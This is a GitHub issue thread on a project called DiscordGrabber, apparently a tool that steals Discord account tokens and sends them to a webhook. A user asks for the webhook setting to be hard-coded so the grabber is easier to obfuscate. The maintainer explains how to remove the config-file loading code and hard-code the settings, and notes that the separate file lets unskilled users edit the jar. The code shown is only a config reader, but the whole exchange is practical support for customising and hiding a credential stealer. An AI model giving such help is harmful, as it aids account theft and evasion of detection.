### ISSUE TITLE
Grabber

### ISSUE THREAD

**Issue by ShazadSkriptREPO** [Xefer-0/DiscordGrabber#5]
Hello, it would be awesome if you make webhook.txt build inside main.java co everyone can obfuscate it eaisly.. :)

**Comment by Xefer-0** [comment]
Do you mean like hard code the settings into the code?

**Comment by ShazadSkriptREPO** [comment]
Yes exactly

**Comment by ShazadSkriptREPO** [comment]
So there's no need to use webhook.txt

**Comment by ShazadSkriptREPO** [comment]
Hello?

**Comment by Xefer-0** [comment]
I have taken a look at what you meant. I have decided not to take it out, since you can do that yourself very easily. It is just:
Remove the file

remove this:
"String s = null;
        StringBuilder configFileString = new StringBuilder();
        InputStream in = Main.class.getResourceAsStream("webhook.txt");
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        while ((s = reader.readLine()) != null) {
            configFileString.append(s).append("\n");
        }"

and in the settings change the "getJsonKey(configFileString.toString(), "setting");"
for the actual setting you want.

The reason I am keeping it in is because many people do not know how to compile the code so they wouldnt be able to edit the settings. whilst if I keep with the seperate file, they can easily open the jar with winrar to edit the file.

Feel free to fork this repo or open another issue.
